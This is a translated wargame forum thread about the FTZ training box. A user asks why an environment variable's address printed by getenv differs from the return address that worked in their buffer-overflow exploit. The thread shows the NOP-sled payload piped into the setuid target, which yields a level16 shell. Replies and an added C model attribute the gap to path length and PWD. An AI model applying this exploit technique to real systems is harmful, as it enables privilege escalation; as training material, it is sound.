System Hacking

   tjdalstjr938
   A question about something I don't understand when doing a BOF attack using environment variables.

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1910


[level15@ftz tmp]$export SCD=`python -c 'print "\xef\xbe\xad\xde"'`

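#include <stdio.h>
#include <stdlib.h>   /* getenv */

int main(void)
{
        /* Print where the value of the SCD environment variable sits in this process. */
        printf("Address of SHELLCODE : %p\n", (void *)getenv("SCD"));
        return 0;
}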

[level15@ftz tmp]$ ./abc
Address of SHELLCODE : 0xbffffe87
[level15@ftz tmp]$ (python -c 'print "\x90"*40+"\x87\xfe\xff\xbf"';cat) | ../attackme

[level15@ftz tmp]$ (python -c 'print "\x90"*40+"\x7B\xfe\xff\xbf"';cat) | ../attackme
whoami
level16

The address I got using getenv is bffffe87, but to actually carry out the attack I had to enter bffffe7b for the attack to work.
Every time I solve a problem using environment variables, the address used in the attack differs from the value getenv prints. Could you tell me the reason, and what values end up in between? ㅠㅠ

  Hit : 3037     Date : 2018/01/02 04:12



    
gihacker Among the environment variables there is pwd, and since pwd is a variable that stores the current directory, the environment variables come out differently if you run from a different location, and other variables sometimes change slightly too. Try looking into it. 2018/01/02
tjdalstjr938 From what I found, the length of the file's full name has to be the same, so the location and the name length both have to match to get the exact address. Is there no way to find the exact address from a different location? 2018/01/02
gihacker Hmm, I think you can use the env command to see what differs and pad it out. 2018/01/02
tjdalstjr938 Thank you for the answer. Thanks to you I learned something. 2018/01/02
gihacker Study hard~ 2018/01/02
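
Added example (not part of the original thread): a small C model of why the address printed by the helper program differs from the one that worked against the target. It assumes the Linux layout in which the exec path string sits at the top of the stack with the environment strings below it, and that the shell exports `_=<command path>` as the last environment entry; the environment contents and the names env_value_depth and env_shift are constructed for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Distance in bytes from the top of the string area down to the first byte
 * of NAME's value. Model (assumption): Linux copies the exec path to the top
 * of the stack, then the environment strings below it, last entry highest. */
size_t env_value_depth(const char *execfn, const char *const envp[],
                       size_t envc, const char *name)
{
    size_t depth = strlen(execfn) + 1;        /* exec path + NUL */
    size_t nlen = strlen(name);
    for (size_t i = envc; i-- > 0; ) {        /* walk from the highest entry down */
        depth += strlen(envp[i]) + 1;         /* now at the start of envp[i] */
        if (strncmp(envp[i], name, nlen) == 0 && envp[i][nlen] == '=')
            return depth - (nlen + 1);        /* value starts after "NAME=" */
    }
    return 0;                                 /* NAME is not in the environment */
}

/* How many bytes lower NAME's value sits in `target` than in `helper`, when
 * the shell also exports "_=<command path>" as the last entry (assumption). */
long env_shift(const char *helper, const char *target, const char *name)
{
    char u1[256], u2[256];
    snprintf(u1, sizeof u1, "_=%s", helper);
    snprintf(u2, sizeof u2, "_=%s", target);
    /* Constructed environment; only entries stored above NAME matter. */
    const char *e1[] = { "HOME=/home/level15", "SCD=AAAA", "PWD=/home/level15/tmp", u1 };
    const char *e2[] = { "HOME=/home/level15", "SCD=AAAA", "PWD=/home/level15/tmp", u2 };
    return (long)env_value_depth(target, e2, 4, name)
         - (long)env_value_depth(helper, e1, 4, name);
}

int main(void)
{
    long shift = env_shift("./abc", "../attackme", "SCD");
    /* Gap between the two addresses quoted in the post. */
    long observed = (long)(0xbffffe87UL - 0xbffffe7bUL);
    printf("modelled shift = %ld bytes, observed gap = %ld bytes\n", shift, observed);
    return 0;
}
```

The path `../attackme` is 6 bytes longer than `./abc` and appears twice above SCD in this model, so the value moves down by 12 bytes, the same gap as between 0xbffffe87 and 0xbffffe7b in the post.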